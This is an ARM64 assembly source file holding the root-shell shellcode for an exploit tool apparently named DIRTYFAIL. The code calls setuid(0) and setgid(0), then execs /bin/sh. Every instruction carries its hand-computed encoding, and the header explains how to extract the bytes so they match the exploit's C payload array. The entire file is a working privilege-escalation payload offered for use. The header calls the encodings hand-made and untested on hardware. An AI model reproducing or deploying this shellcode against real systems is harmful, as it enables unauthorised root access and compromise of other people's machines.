/*
* DIRTYFAIL aarch64 (ARM64) shellcode for --exploit-su
*
* Equivalent to the x86_64 shellcode in src/exploit_su.c but encoded
* for the aarch64 syscall ABI (x8 = syscall number, x0..x5 = args,
* `svc #0` to invoke). 20 instructions × 4 bytes = 80 bytes total.
*
* Build for byte-extraction:
*
* aarch64-linux-gnu-as -o exploit_su_aarch64.o exploit_su_aarch64.S
* aarch64-linux-gnu-objcopy -O binary -j .text \
* exploit_su_aarch64.o exploit_su_aarch64.bin
* xxd -i exploit_su_aarch64.bin
*
* The resulting byte array should match `shellcode_aarch64[]` in
* `src/exploit_su.c`. If it doesn't, the C array is wrong and needs
* to be regenerated from this source.
*
* Functional equivalent (in C-like pseudocode):
*
* setuid(0);
* setgid(0);
* execve("/bin/sh", (char *[]){"/bin/sh", NULL}, NULL);
*
* STATUS: HAND-ENCODED — VERIFY BEFORE DEPLOYING TO PRODUCTION.
* The byte array in src/exploit_su.c was produced by manually
* cross-referencing each instruction against the ARMv8-A reference
* manual; no aarch64 hardware was available to run the resulting
* shellcode end-to-end. Use this .S file to regenerate via the
* assembler if you need confidence.
*/
.text
.global _start
/*
 * Entry point. Register roles for the whole sequence:
 *   x8 = syscall number, x0..x2 = syscall arguments (aarch64 Linux ABI),
 *   x9 = the 8-byte "/bin/sh\0" word, later the pointer to it on the stack.
 * Every sp adjustment below is a multiple of 16, so sp stays 16-byte
 * aligned at each memory access, as AArch64 requires.
 * The return values of setuid/setgid (x0) are not checked; x0 is simply
 * reloaded before the next svc.
 *
 * Each instruction carries its hand-computed 32-bit encoding written as
 * a big-endian hex word (most significant byte first). AArch64 instructions
 * are stored little-endian, so the bytes emitted by `xxd -i` appear in
 * reversed order within each 4-byte group (e.g. d2 80 00 00 -> 00 00 80 d2).
 * The assembler output, not these comments, is the source of truth.
 */
_start:
/* setuid(0) — syscall 146 (0x92) on aarch64 */
movz x0, #0 /* d2 80 00 00 */
movz x8, #146 /* d2 80 12 48 */
svc #0 /* d4 00 00 01 */
/* setgid(0) — syscall 144 (0x90). x0 is reloaded; the setuid result is discarded. */
movz x0, #0 /* d2 80 00 00 */
movz x8, #144 /* d2 80 12 08 */
svc #0 /* d4 00 00 01 */
/* Build "/bin/sh\0" in x9.
*
* As a 64-bit little-endian word, "/bin/sh\0" = 0x0068732f6e69622f
* bits 0..15 = 0x622f (chars '/' 'b' in low->high order)
* bits 16..31 = 0x6e69
* bits 32..47 = 0x732f
* bits 48..63 = 0x0068
*
* movz zeroes the whole register and writes the low half-word; each movk
* keeps the other bits and merges one shifted 16-bit chunk, so after the
* four instructions x9 holds the full word including the terminating NUL.
*/
movz x9, #0x622f /* d2 8c 45 e9 */
movk x9, #0x6e69, lsl #16 /* f2 ad cd 29 */
movk x9, #0x732f, lsl #32 /* f2 ce 65 e9 */
movk x9, #0x0068, lsl #48 /* f2 e0 0d 09 */
/* Push the string to the stack (sp -= 16; [sp] = x9).
 * Pre-indexed store: sp is decremented by 16 first, then x9 is written at
 * the new sp. The upper 8 bytes of this slot are left untouched. */
str x9, [sp, #-16]! /* f8 1f 0f e9 */
mov x9, sp /* 91 00 03 e9 string ptr (encoded as add x9, sp, #0) */
/* Build argv = [x9, NULL] on the stack: sp -= 16; sp[0] = x9; sp[8] = NULL. */
sub sp, sp, #16 /* d1 00 43 ff */
str xzr, [sp, #8] /* f9 00 07 ff argv[1] = NULL */
str x9, [sp, #0] /* f9 00 03 e9 argv[0] = ptr */
/* execve(pathname=x9, argv=sp, envp=NULL) — syscall 221 (0xdd)
 * x0 = pathname, x1 = argv (current sp), x2 = NULL envp.
 * On success execve does not return; nothing follows the svc. */
mov x0, x9 /* aa 09 03 e0 (orr x0, xzr, x9) */
mov x1, sp /* 91 00 03 e1 (add x1, sp, #0) */
mov x2, xzr /* aa 1f 03 e2 (orr x2, xzr, xzr) */
movz x8, #221 /* d2 80 1b a8 */
svc #0 /* d4 00 00 01 */